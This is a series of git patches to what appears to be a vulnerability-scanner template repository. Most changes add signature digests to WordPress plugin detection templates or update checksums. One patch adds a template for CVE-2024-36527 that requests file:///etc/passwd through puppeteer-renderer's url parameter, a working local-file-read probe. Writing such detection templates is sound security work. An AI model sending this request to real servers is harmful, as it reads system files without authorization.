b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071542ffac214eacc8f93d4bc2bfc3985d30759a9f01512c8f1d8719b122a3a2f0220549e0b8519beaecd9f904a5f64da0501207760d1721291ac73035a3be046a8a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..0982feef3a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008885e75a521639c9a49f154a694ad1298f7376d6e769d2da103c883160dfbd95022071d4f02ada036ce718b6d90eb1b550d5b5b3ac7bd10416f73dbb2f17d034091e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..0bab6bf27e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022058213f490f32080436ef813589fb86e54bd13e8e0218de4a3fd89a06dde5b6c702202c37bebbc2885c375b1b627d40f379b268b087a00f763a077293504ba8b280ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..30d790bc13 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e76f353338aaae38e434658acbda2ae9a972290ea29e4a45a196669d6c004c802205db826813b2796d1b408d0817c888d47e0d9d0ac4759d6d8e78d083af0d7189e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..5e13c69f6c 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203d9f80756f413dc139bea4d3bc732713cce79d9aaa206df7f0fae9555f4973e7022100fd24391f392da96fbd681ccacf5de9e5d08833c98c2311245f1c13ee1b75cd38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..e408b79e01 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100df0fdec73bee45861fd872eed2777a3531fa1659e6a58e09d222351b30ff18a402210087ea4a197d3e0205665b1b8ef7844bfb40170c038741ff26f34c16a1419fb039:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..bdddab7453 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100df412f0b29f9a8b3b32255987aa4e098111579cd1d10c8ee68bdb59460601a1c02204160bad8924f0e4e64d9d6d071b6214c9c8688f4932eae59df178b1f5e16128c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..b4470c755e 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f23ccc5a277856b768bf24790182c4a25103b2e759600194a9868fd389f6577002200fa3e5b43294653d854ab7e11383213c2c5fcc3eed6a7ecc86291a295c99ed92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..08e0018000 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200bac842aea75d6b886c9fbdb56000670138ad31f39ffef2817d7031a9e4e7c4e022100ca9ff14cd0bfd7c327cb0b04cf56682fcfa72752d8e333d9ae855523860553e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..831858fb94 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f21ccdd18b0ff3852849ea2a042b6f4011bb865d220e33f30b77eb29f005e36a02200f037a3cdc109b397044ef7109446b6fa7279fa8415100a13928afa263a2ba66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..8a9b06e5d1 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b8d26a14aa1f2c863dbbe751252a0249474b9345fd673a5ab1bd2453932c5260022100959c276851a8197233f85925f8eac6516777c4c78f16d82913916b5135c0c871:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..90145e4a86 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009eab7e1f1006947a95b4b084fb75d95c497da91de193c39efd000e931f8a39fc022100c0870b5a316a727452e6aaa7753d56b10335634a0f907f81eb2ab1ff6c2a8318:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..33226f5242 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aec3d5c340b46a36502e03203197711c2e9d608808603c6288a0afd0bf23ed04022068c5692593a121ac7272b5fbfadca8046e81b7e1c4508641ec5037c6739ea197:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..7e65414e85 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205416664f2cdcd0118da80bc613e191dc5ea1d561cbb780c276456839b24b47b4022068709d3ee0e926fe9d84f522597d62b89c92b3f0fafab496b1ae50d27f5fe068:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..efbe25a90f 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207c55e45e7af7a6138681290d8ed75617bcb961ed87c5ee20c51ce8235bf63423022100ae847f47b9bc70a6e95ab5390b7666dda7a9fbbe9ad74369ab822f6d34c674a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 34115bcd0f..0ac1c54ef3 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a7d145657518e6fba7ef617a0fad9cef635bb83346370c5ba6b0a4d9c4f348cf022100aea77fcc2bcf5af9939bcb10611d8eff093a5a5b9730f0b45a4595b59e25611a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..bdb8f899e1 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bb7d518530ffa006192a55bba765d5bc1534695243c74c6a2b5a1dd338b7419d02204060f14292677d6be7076a09bdd248e284ff3b98528751ec98f632cbaa6d14e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..c6198742e5 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b44a5772bfcf4c6aeb0c7cc2badf9b36a226f0ac323b7c97968e192035ae711a022022a5d5e15da9316fea4fd85bdfc377e46a2ae9aa45adb6f7dada09e7f01f9c3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..f444532799 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fb75599e9fb877da457f66f0ef5053479123ce721606b6e6e6580332e1b4f61d022100d91c45e22936a9bba93e918ec3cd5eaa0aebc305ab918032ae8ca96f323c6d1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index c3ec4ebd80..3d258946fd 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200cb7f0bb682f9e649208a55ac46747a2b010f0db741e9c32fc35b0e3218aea9102207988a28783ec2845beb066c71449f4a37f6f8c492e1a9900714b064189383d3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 2276545093..c32e6560d9 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210087ca52b913210a80af8997f24359ee7b880d08aad92f74b87a340d62edf46148022100f5bf0905a2de56cf30965e65ab463457ee1f7d2099971084bfae433e248f0ddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..7ef19e4099 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022032a8f6687bf25362004c2f28fae210f399ea97be2ea60a19bf0e1d00e9c3ccb70220376a09276067f63536c1e3eeef47ca9c7cee75f43aecf33d8b7e962227b42bca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 7b28bf7020..73e5df3c0c 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d08fef85e4a20c69cbbefa4ebbb65e4c2464c8aa70ec0278f76da9de20de3246022100c431e14c2f68a9b8e8f84a1d37745445ee2b4812e020f1b3e2435611682a444c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index da6abc2a81..a000e1106e 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022064954895dab0b6b9b36162d64b94d1a8acba227669a4691cb3798cdea39deea9022100c71e1fca49de36e4286eb385c98515eba489b212d6a43586328b785593915f9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..3db10ba633 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022046a7f0c0b57cd0481506b1699179a608b01ffd40e1da5acaa85f809c31a3aca3022100e92d72755499a916bdde3ba9b78d8c44554519a9059c4c2dd6303c673e71d651:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..64a03a1922 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ec039257d787af69c95d795b2a20b32b3a432862dbb8f7e1258a0419996a748f022078f7d6a0b343fa518be7f0a7630509ea655e3e82d29bfef2a57c6119a06507d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..cb8f5084c3 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fb871c5d75ad1a817cdaf27ac73d979ed76cd14ece305397b3de16c2328f0226022066881a199268b47eddaa54a95e5470fc6da8d3d30add05a3e6b7bced84562f35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..4c4a7ed8af 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022068508bc9cb0f17f8d53de554247221952f2c79cafb757ef54b4c03f52620f45102207a2c525409f2846d1d993d6bf7de6991e05ef324c0f25bd25b6081df2c9915d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..c3e27b1b06 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220369f5ed965d2d84468a8a0632e085356f6383f4ec24caff37b1e4802d528190802200edba397a3db7a080a1c3fa342b90e46e2480f30f1c4b51b49f48f28e61058f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..739906e60f 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206498556a7cef761b4630677adcb9ed392911286913293d3a2ef545d8c8cc704c022016b3262c01248a5b88436af9e427948f634def9f3976d64d51e737d0545f118a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..3c76cb8bb3 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022047af4995c8b7da5eb0036d95775a0efef4b0dc167ab385d4cfd0d09bc1ab58b8022100d8dde698cc10a10cb0b8039bf2688c80c2012177d6984b961d465ba1c8796c71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/fastadmin-lfi.yaml b/http/vulnerabilities/other/fastadmin-lfi.yaml index f5f4d0094c..fc193575d1 100644 --- a/http/vulnerabilities/other/fastadmin-lfi.yaml +++ b/http/vulnerabilities/other/fastadmin-lfi.yaml @@ -32,3 +32,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100fa5b97dac2270310edd8e5f61e36f45e9fa2a3496faf9cacc0bd330f402ea133022100bb4bbcb15ebabf6569c9c65e1ee8f49d6ab3b381c021c68e2b4aad17b9b8ae26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b451985343f562a041b3d9c8e9de1da34a8f8556 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 24 Jun 2024 11:10:04 +0530 Subject: [PATCH 0519/1841] minor update --- CVE-2024-36527.yaml | 26 ----------------------- http/cves/2024/CVE-2024-36527.yaml | 34 ++++++++++++++++++++++++++++++ 2 files changed, 34 insertions(+), 26 deletions(-) delete mode 100644 CVE-2024-36527.yaml create mode 100644 http/cves/2024/CVE-2024-36527.yaml diff --git a/CVE-2024-36527.yaml b/CVE-2024-36527.yaml deleted file mode 100644 index e97c831e96..0000000000 --- a/CVE-2024-36527.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2024-36527 - -info: - name: Puppeteer-renderer Directory Traversal - author: Stux - severity: medium - description: | - puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server. - reference: - - https://github.com/zenato/puppeteer-renderer/issues/97 - metadata: - max-request: 1 - tags: cve,cve2024,puppeteer-renderer - -http: - - method: GET - path: - - "{{BaseURL}}/html?url=file:///etc/passwd" - - matchers: - - type: word - words: - - "root:x" - - "/bin/bash" - part: body - condition: or \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-36527.yaml b/http/cves/2024/CVE-2024-36527.yaml new file mode 100644 index 0000000000..6840715a7f --- /dev/null +++ b/http/cves/2024/CVE-2024-36527.yaml @@ -0,0 +1,34 @@ +id: CVE-2024-36527 + +info: + name: Puppeteer Renderer - Directory Traversal + author: Stux + severity: medium + description: | + puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially gaining access to sensitive information. + remediation: | + Users should update to version 3.3.0 or later where this issue has been addressed. Additionally, ensure that input validation is implemented to restrict the url parameter to only http and https protocols. + reference: + - https://github.com/zenato/puppeteer-renderer/issues/97 + - https://gist.github.com/7a6163/25fef08f75eed219c8ca21e332d6e911 + metadata: + max-request: 1 + verified: true + tags: cve,cve2024,puppeteer-renderer + +http: + - method: GET + path: + - "{{BaseURL}}/html?url=file:///etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From b468738fc4d359b9cb4c3866077c9ac0c7363da4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 24 Jun 2024 11:13:32 +0530 Subject: [PATCH 0520/1841] Update and rename trellix-panel-detect.yaml to trellix-panel.yaml --- .../{trellix-panel-detect.yaml => trellix-panel.yaml} | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) rename http/exposed-panels/{trellix-panel-detect.yaml => trellix-panel.yaml} (79%) diff --git a/http/exposed-panels/trellix-panel-detect.yaml b/http/exposed-panels/trellix-panel.yaml similarity index 79% rename from http/exposed-panels/trellix-panel-detect.yaml rename to http/exposed-panels/trellix-panel.yaml index db45b87012..9109b3466f 100644 --- a/http/exposed-panels/trellix-panel-detect.yaml +++ b/http/exposed-panels/trellix-panel.yaml @@ -1,14 +1,16 @@ -id: trellix-panel-detect +id: trellix-panel info: name: Trellix Login Panel author: johnk3r severity: info - description: Trellix login panel was detected. + description: | + Trellix login panel was detected. metadata: max-request: 1 shodan-query: "Server: Trellix" - tags: trellix,panel + verified: true + tags: trellix,panel,login http: - method: GET From 1fad04ed8158ac747bd2f1b391d6f48de140c146 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 24 Jun 2024 11:52:49 +0530 Subject: [PATCH 0521/1841] Update apache-allura-detect.yaml --- http/technologies/apache-allura-detect.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/technologies/apache-allura-detect.yaml b/http/technologies/apache-allura-detect.yaml index 902cf2ae2d..1e14dfc5e6 100644 --- a/http/technologies/apache-allura-detect.yaml +++ b/http/technologies/apache-allura-detect.yaml @@ -1,7 +1,7 @@ id: apache-allura-detect info: - name: Apache Allura Detection + name: Apache Allura - Detection author: icarot severity: info description: | @@ -14,6 +14,8 @@ info: max-request: 1 vendor: apache product: allura + verified: true + fofa-query: body="Apache Allura" tags: tech,allura,apache,detect http: From 42a6a72a0cd0cb4cbf0983ed045d49c3f92a226c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 24 Jun 2024 12:44:15 +0530 Subject: [PATCH 0522/1841] Update ibm-maximo-login.yaml --- http/exposed-panels/ibm/ibm-maximo-login.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/exposed-panels/ibm/ibm-maximo-login.yaml b/http/exposed-panels/ibm/ibm-maximo-login.yaml index 1847aafbf6..066ad921a7 100644 --- a/http/exposed-panels/ibm/ibm-maximo-login.yaml +++ b/http/exposed-panels/ibm/ibm-maximo-login.yaml @@ -36,7 +36,6 @@ http: words: - "maximo-icon.png" - "IBM" - - "Maximo" condition: and - type: status From 0d17c29b4427308d61ac504751842b4e5c07aa79 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 24 Jun 2024 07:29:19 +0000 Subject: [PATCH 0523/1841] Auto Generated Templates Checksum [Mon Jun 24 07:29:19 UTC 2024] :robot: --- templates-checksum.txt | 406 ++++++++++++++++++++--------------------- 1 file changed, 203 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6aeffe6536..38ebabdaff 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4056,7 +4056,7 @@ http/exposed-panels/i-mscp-panel.yaml:049d48ab1b7614f1e5b08017b97fa60bce0f3a52 http/exposed-panels/ibm/ibm-advanced-system-management.yaml:fd306898b10a9986f447dce9e8f4a20bfe5b1f29 http/exposed-panels/ibm/ibm-dcec-panel.yaml:85de4a0aac53b7dd180b06e04f837e737a769639 http/exposed-panels/ibm/ibm-decision-server-console.yaml:9bc550d72018a4bb6fd09c5466136ddfb003891e -http/exposed-panels/ibm/ibm-maximo-login.yaml:aaf8da0bfec6d4b716d5f5eeba93337e0064ab21 +http/exposed-panels/ibm/ibm-maximo-login.yaml:7193d47b9dc555f1ec3847d3cd8c57d4fdd80257 http/exposed-panels/ibm/ibm-mqseries-web-console.yaml:fe2cb848a2d5afd37b6701deac3321ab96befab9 http/exposed-panels/ibm/ibm-note-login.yaml:8a5f0a28a24b645b7d2e0c499246e08276dfcfcd http/exposed-panels/ibm/ibm-odm-panel.yaml:a4b0d5f8dd884061a745fe85fea95887dc948e23 @@ -7183,227 +7183,227 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:702d9ad28927671bb2b198387694667abc971de6 +http/technologies/wordpress/plugins/add-to-any.yaml:b6a9117115040cc51058f069bfe6a456f2ea4116 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:f7094dfd4684eb5411df9525a4ede88c35862213 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:2194fae4e6285f26a0ae8c64c042d90a112a4aad +http/technologies/wordpress/plugins/akismet.yaml:e459a9572a25dd878278113026687839d0b16339 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:eb2d239e57dc3353581cc430cfc10498c1f4ad90 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:edf9d06299d702f2f2ffe2da8ed48bde284fcd12 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:58d4ef573d4fd9b189f11e966b9942550df5c97c +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:086d7dffb5b8bd279241a9c9452637c6f6feedb4 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:a9fbcdd7a6003cd0b343df8acab2c60b00ea8058 +http/technologies/wordpress/plugins/amp.yaml:957044c3f381b457ac95f0ac05065d656e36d08b +http/technologies/wordpress/plugins/antispam-bee.yaml:6df78afb426acac4bfa2cc6cca6664e5081df4bc +http/technologies/wordpress/plugins/astra-sites.yaml:8d2b36315eda5fbb14c86af8be9505ccfacba964 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 